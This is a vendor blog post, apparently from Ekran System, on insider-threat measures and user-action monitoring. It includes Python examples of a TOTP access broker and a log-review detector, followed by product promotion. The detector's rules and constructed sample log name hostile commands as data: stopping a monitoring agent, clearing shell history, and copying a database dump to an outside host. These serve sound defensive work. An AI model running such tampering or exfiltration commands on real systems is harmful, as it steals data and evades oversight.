This post continues our article on how to create your cyber security checklist. In the first part we took an in-depth look at what it takes to formulate a cyber security strategy and build an effective checklist, and covered 5 steps you can take to protect your data from a wide variety of threats, both outside and inside the organization.
In this part we focus on measures that are less obvious and that not every company puts in place. Most of them are aimed at a rarely discussed but potentially very damaging class of attack: the insider attack.
Many companies assume that malicious insiders target only large organizations and underestimate the risk to their own data from within. In reality, every company is vulnerable to malicious insiders, and failing to address this threat also weakens your defenses against outside attackers: an attacker who compromises an account inherits whatever access that account was left with.
So without further ado, let's look at 3 key steps you can add to your cyber security checklist to improve the protection of your sensitive data, particularly from malicious insiders.
- Use the principle of least privilege. When assigning privileges to user accounts, grant each new account the smallest set of privileges it can work with by default. The level can be raised later if the user turns out to need access to more sensitive data. Applying this principle is the simplest way to limit the number of privileged accounts in your company and to ensure that only accounts that actually need access to sensitive data have it.
- Create a procedure for granting and revoking privileges. Privileges also need to be granted and revoked as requirements change. A common situation is a user who needs privileged access temporarily; such access is often granted and then never revoked, leaving the user able to reach sensitive data long after they need it. This is insecure not only from an insider-threat standpoint but also if the account is later compromised from the outside, because the attacker inherits the stale privileges.
- Make sure to disable the access of terminated employees. Malicious actions are often carried out by disgruntled employees who kept their privileged access after termination. In many cases employees feel they were terminated unjustly, and if their user accounts are not disabled they may use them to harm the company or steal sensitive data. Put a procedure in place, as part of offboarding, to disable such accounts promptly; the same procedure should catch accounts that are simply no longer used.
- Use a way to elevate privileges temporarily. A good way to manage privileges is to grant them only when necessary and revoke them as soon as they are no longer needed. Doing this manually is hard, particularly in large companies. A better way is an automated mechanism, such as a one-time password solution that grants secure temporary access to sensitive data on a per-session basis. This keeps privilege management efficient and ensures that no account is left with an unnecessarily high level of privilege.
- Issue a strong, unique password to each employee. Thorough account protection starts with a unique and reliable password. The password must not be reused for any other account, personal ones in particular, and must be long and complex enough that it cannot be recovered by brute force.
- Prohibit password sharing. Each account must have its own unique password, and employees must not share their passwords with one another.
- Prohibit account sharing. Sometimes several users work through a single account. This is particularly common among sysadmins, who often share one admin or root account between them. Such account sharing should be limited as much as possible, and employees should be prohibited from handing their credentials to each other. Sharing credentials can make a job faster or more convenient, but it severely weakens the security of the accounts involved and makes it impossible to tell who actually performed an action. Employee cyber security awareness training is needed to combat this.
- Use secondary authentication. One effective way to strengthen your accounts, deal with shared accounts and at the same time control exactly who accesses your sensitive data is a secondary authentication solution. Because the second factor is tied to a person rather than to the account, it identifies which individual is behind a given session. It can be implemented with physical security tokens or, for a distributed workforce, with employees' mobile devices.
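The privilege lifecycle described in the items above (grant the minimum by default, grant temporarily with an expiry, revoke at offboarding, and identify the person behind each session with a second factor) as one added Python example. This is illustration code written for this article, not Ekran System's implementation; `AccessBroker` and `Grant` are hypothetical names, and the second factor is a standard RFC 6238 time-based one-time password (HMAC-SHA1, 30-second step, 6 digits) rather than any particular vendor's token scheme. The key in the walk-through is the RFC's published SHA-1 test key, so the codes it produces can be checked against the RFC's table.

```python
"""Least-privilege access broker: temporary grants, offboarding revocation and a
per-person second factor. Added example, not Ekran System code; names are
hypothetical and the second factor is plain RFC 6238 TOTP (HMAC-SHA1, 30 s, 6 digits)."""
from __future__ import annotations

import hashlib
import hmac
import struct
from dataclasses import dataclass

STEP = 30  # TOTP time step in seconds


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, now: int, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter derived from Unix time."""
    return hotp(secret, now // STEP, digits)


def verify_totp(secret: bytes, code: str, now: int, window: int = 1) -> bool:
    """Accept the current step and +/- `window` steps for clock drift;
    compare_digest keeps the comparison constant-time."""
    return any(hmac.compare_digest(totp(secret, now + d * STEP), code)
               for d in range(-window, window + 1))


@dataclass
class Grant:
    user: str        # the person, never the shared account they will use
    resource: str    # one resource per grant: the minimum that is needed
    expires_at: int  # every temporary grant expires; nothing is open-ended


class AccessBroker:
    def __init__(self) -> None:
        self.secrets: dict[str, bytes] = {}  # per-person TOTP secrets
        self.grants: list[Grant] = []        # currently active grants
        self.terminated: set[str] = set()    # offboarded people

    def enroll(self, user: str, secret: bytes) -> None:
        self.secrets[user] = secret

    def grant(self, user: str, resource: str, now: int, ttl: int) -> Grant:
        """Issue a time-limited grant; refuse offboarded or unenrolled people."""
        if user in self.terminated:
            raise PermissionError(f"{user} has been terminated")
        if user not in self.secrets:
            raise PermissionError(f"{user} has no second factor enrolled")
        g = Grant(user, resource, now + ttl)
        self.grants.append(g)
        return g

    def terminate(self, user: str) -> int:
        """Offboarding: block the person and revoke all their grants at once.
        Returns how many grants were revoked."""
        self.terminated.add(user)
        self.secrets.pop(user, None)
        kept = [g for g in self.grants if g.user != user]
        revoked = len(self.grants) - len(kept)
        self.grants = kept
        return revoked

    def sweep(self, now: int) -> list[Grant]:
        """Revoke expired grants. Called on every access check (and ideally on a
        timer) so temporary access never lingers once it is no longer needed."""
        expired = [g for g in self.grants if g.expires_at <= now]
        self.grants = [g for g in self.grants if g.expires_at > now]
        return expired

    def open_session(self, user: str, resource: str, code: str, now: int) -> tuple[bool, str]:
        """Per-session check: current employee, proved who they are with their
        own second factor, and holds an unexpired grant for this resource."""
        if user in self.terminated or user not in self.secrets:
            return False, "unknown or terminated user"
        if not verify_totp(self.secrets[user], code, now):
            return False, "second factor failed"
        self.sweep(now)
        for g in self.grants:
            if g.user == user and g.resource == resource:
                return True, f"{user} -> {resource} until {g.expires_at}"
        return False, "no active grant for resource"


if __name__ == "__main__":
    # Constructed walk-through with a fixed clock so the output is reproducible.
    key = b"12345678901234567890"  # RFC 6238 test key; use a random 20-byte secret in practice
    broker = AccessBroker()
    broker.enroll("alice", key)
    broker.grant("alice", "db-prod", now=60, ttl=3600)
    print(broker.open_session("alice", "db-prod", totp(key, 60), now=60))      # granted
    print(broker.open_session("alice", "db-prod", totp(key, 3660), now=3660))  # grant expired
    broker.grant("alice", "db-prod", now=3700, ttl=600)
    print(broker.terminate("alice"), "grant(s) revoked at offboarding")        # 1
```

Two design points matter here. The second factor belongs to the person and is checked on every session, so even when the session then runs under a shared account such as root, the record shows who opened it. And a grant is never removed by someone remembering to remove it: it either expires on its own or disappears when the person is offboarded, which closes both the stale-privilege and the terminated-employee gaps in one mechanism. In production the per-person secret would be generated with `secrets.token_bytes(20)` and provisioned once at enrollment.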
User action monitoring
- Monitor privileged user actions. User action monitoring is your main tool for detecting data theft and misuse, whether by malicious insiders or through compromised accounts. The most attention should go to the users with the widest access and the highest level of privilege. Privileged users are usually the most trusted people in an organization, but they are also the ones who can most easily steal sensitive data without anyone noticing. Because their malicious actions are hard to distinguish from their regular routine, user action monitoring is often the only tool that effectively detects malicious insiders among privileged users.
- Monitor remote users and third parties. Many companies have remote workers, subcontractors and partners, all of whom access sensitive information remotely. Even if security is fully up to standard on your end, it may not be on theirs. Monitoring the actions of remote users while they work in your network is the best way to detect both malicious and inadvertent insiders.
- Make sure each user is clearly identified. One of the big challenges of user action monitoring is dealing with shared accounts. Each session needs to be clearly associated with the person who initiated it, so choose an action monitoring solution that includes a way to identify the individual users of shared accounts.
- Make sure monitoring cannot be disabled or tampered with. Technically savvy users can disable a monitoring process or alter its records to cover their tracks. To avoid this, use a user action monitoring solution that keeps monitoring regardless of the user's privilege level or any action the user takes on the endpoint, and keep the recorded sessions off the monitored endpoint so that a user who does gain control of the host cannot alter them. One example of such a solution is Ekran System, a user action monitoring tool that protects its monitoring agent with a special driver so that a user on the monitored endpoint cannot disable it.
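An added example of the monitoring rules the items above call for, run over a few constructed session-log lines: it attributes each privileged session to a person, and flags unattributed shared-account use, commands aimed at the monitoring agent or its logs, access to sensitive paths, outbound copies of sensitive files, and third-party access outside working hours. This is example code written for this article, not Ekran System's alert engine; the log format, the agent name `monitor-agent`, the contractor address range 203.0.113.0/24, the sensitive paths and the 08:00 to 18:00 UTC working-hours window are all assumptions, and the sample lines are constructed, not real data.

```python
"""Rule-based review of privileged session logs. Added example for this article,
not Ekran System's alert engine. The log format, agent name, address range,
sensitive paths and working-hours window are constructed assumptions."""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass
from datetime import datetime, timezone

# One line per executed command: time, account used, person identified by
# secondary authentication (empty when none), source address and the command.
LINE = re.compile(r'^(?P<ts>\S+) account=(?P<account>\S+) user=(?P<user>\S*) '
                  r'src=(?P<src>\S+) cmd="(?P<cmd>[^"]*)"$')
PRIVILEGED_ACCOUNTS = {"root", "administrator"}
THIRD_PARTY_PREFIX = "203.0.113."   # assumed contractor VPN range
SENSITIVE_PATHS = ("/etc/shadow", "/var/lib/db/", "/srv/finance/")
AGENT = "monitor-agent"             # hypothetical monitoring agent name
WORK_HOURS = range(8, 18)           # assumed 08:00-18:00 UTC


@dataclass
class Event:
    ts: datetime
    account: str
    user: str
    src: str
    cmd: str
    argv: list[str]


def parse(line: str) -> Event | None:
    """Return an Event, or None for a line that does not match the format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    try:
        argv = shlex.split(m["cmd"])
    except ValueError:              # unbalanced quotes: fall back to a plain split
        argv = m["cmd"].split()
    return Event(ts, m["account"], m["user"], m["src"], m["cmd"], argv)


def touches_sensitive(argv: list[str]) -> bool:
    return any(p in arg for arg in argv[1:] for p in SENSITIVE_PATHS)


def unattributed_shared_account(e: Event) -> bool:
    # A privileged shared account with no person behind it cannot be investigated.
    return e.account in PRIVILEGED_ACCOUNTS and not e.user


def monitoring_tamper(e: Event) -> bool:
    # Stopping or killing the agent by name, wiping logs, or hiding shell history.
    # A bare `kill <pid>` is not caught here; that needs process correlation.
    if not e.argv:
        return False
    if AGENT in e.cmd and e.argv[0] in ("systemctl", "service", "kill", "pkill", "killall"):
        return True
    if e.argv[0] in ("rm", "truncate", "shred") and any("/var/log" in a for a in e.argv[1:]):
        return True
    return e.cmd.startswith("history -c") or "HISTFILE" in e.cmd


def possible_exfiltration(e: Event) -> bool:
    # An outbound copy tool given a sensitive path as an argument.
    return bool(e.argv) and e.argv[0] in ("scp", "rsync", "sftp", "curl") and touches_sensitive(e.argv)


def third_party_after_hours(e: Event) -> bool:
    return e.src.startswith(THIRD_PARTY_PREFIX) and e.ts.hour not in WORK_HOURS


RULES = [
    ("unattributed shared account", unattributed_shared_account),
    ("monitoring tampering", monitoring_tamper),
    ("sensitive data access", lambda e: touches_sensitive(e.argv)),
    ("possible exfiltration", possible_exfiltration),
    ("third-party access outside business hours", third_party_after_hours),
]


def review(lines: list[str]) -> list[tuple[str, str, str, str]]:
    """Run every rule over every parsable line. An alert carries the time, the
    person (falling back to the account), the rule name and the command."""
    alerts = []
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        for name, rule in RULES:
            if rule(e):
                alerts.append((e.ts.isoformat(), e.user or e.account, name, e.cmd))
    return alerts


# Constructed sample session log, not real data.
SAMPLE = """\
2021-03-04T09:12:01Z account=root user=alice src=10.0.0.5 cmd="tail -n 50 /var/log/syslog"
2021-03-04T09:14:30Z account=root user= src=10.0.0.9 cmd="id"
2021-03-04T22:15:01Z account=deploy user=contractor1 src=203.0.113.7 cmd="cat /srv/finance/payroll.csv"
2021-03-04T22:15:40Z account=root user=bob src=10.0.0.5 cmd="systemctl stop monitor-agent"
2021-03-04T22:16:02Z account=root user=bob src=10.0.0.5 cmd="scp /var/lib/db/customers.sql bob@203.0.113.20:/tmp/"
2021-03-04T22:16:30Z account=root user=bob src=10.0.0.5 cmd="history -c"
"""

if __name__ == "__main__":
    for alert in review(SAMPLE.splitlines()):
        print(*alert, sep=" | ")
```

Run as-is, the first line (a routine root command by an identified user) produces no alert, while the unattributed root session, the contractor's after-hours read of a finance file, and bob's sequence of stopping the agent, copying a database dump to an outside host and clearing his history each produce one or more. The point of the rule set is the combination: alerts name a person rather than "root", and the tampering rule fires from the session record itself, so a user who stops the agent is flagged by the very log that tampering was meant to hide.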
Ekran System – user action monitoring solution for your cyber security
As effective as user action monitoring is, many companies leave it out of their cyber security checklists. There are several reasons for this. First, they may underestimate the danger of insider threats and so see no value in being able to prevent and detect them.
However, with recent high-profile data breaches by malicious insiders in the news (such as the Edward Snowden NSA leaks), many companies now understand how much damage a malicious insider can do, which prompts them to rethink their approach to this threat.
But even when a company wants to put measures against insider threats in place, it often finds most user action monitoring solutions on the market too expensive. Most of them are designed with large enterprises in mind and use pricing models that make smaller deployments uneconomical.
Ekran System is a user action monitoring solution designed for both large companies and SMBs. It has a flexible pricing model: the Standard license is charged only by the type and number of monitored endpoints, which makes small deployments very cost-effective, while large enterprises can purchase an additional Enterprise license for a set of features designed specifically for large companies.
Main features of Ekran System include:
- Robust recording capabilities – Ekran System records everything the user sees on screen, including mouse movements, together with metadata such as keystrokes, the names of opened applications, visited URLs and the commands entered during SSH/Telnet sessions. All of this is stored in a purpose-built indexed video format, optimized to minimize bandwidth and storage requirements. Recordings can be viewed in a convenient video player, giving you full insight into the user's actions during each session.
- Additional authentication and one-time passwords – Ekran System uses additional authentication to distinguish between the users of shared accounts. Each user is assigned an additional, unique set of credentials to enter during login. The Enterprise license also adds a one-time password feature, designed to give enterprises an easy and secure way to grant temporary access to a protected server to anyone who may need it.
- Customizable and pre-defined alerts – Ekran System ships with a set of pre-defined alerts covering the most common suspicious events that most companies will face. Alerts can also be fully customized to fit the needs of your company.
- Live session viewing and blocking – On receiving an alert notification, security personnel can view the session in question live (if it is still ongoing) and decide whether to block it. This lets you start investigating an incident while it is still happening and take measures to limit, or possibly prevent, the damage.
- USB device blocking – Ekran System can detect and, optionally, automatically block any USB device connected to a monitored endpoint. USB mass storage devices are often used to steal sensitive data, and Ekran System makes it easy to prevent their use.
- Easy setup and reliability – Ekran System is easy to set up and use. As an agent-based solution, its deployment requires no changes to your existing network infrastructure (although Ekran System can also be installed on a jump or bastion-type server). It has low system requirements and causes no noticeable impact on performance. When a new version is installed, all agents are updated automatically, so maintenance is no hassle.
All in all, Ekran System is a user action monitoring tool that allows not only large companies but also small and medium-sized organizations to build their own insider threat protection, greatly strengthening their overall cyber security posture.
We hope that the measures and best practices presented in this two-part article give you some ideas for building your own cyber security checklist. Cyber security implementation is a continuous process: the threats we face evolve daily, so our ways of fighting them evolve too, and that evolution should be reflected in your company's cyber security strategy.
Regular and thorough risk assessments are key to keeping up with the latest threats and the security practices designed to combat them. But, as is often the case, the ability to improve something later requires a solid foundation to begin with. Your cyber security strategy today is the groundwork for the security of your data tomorrow, so it is necessary to get that strategy right.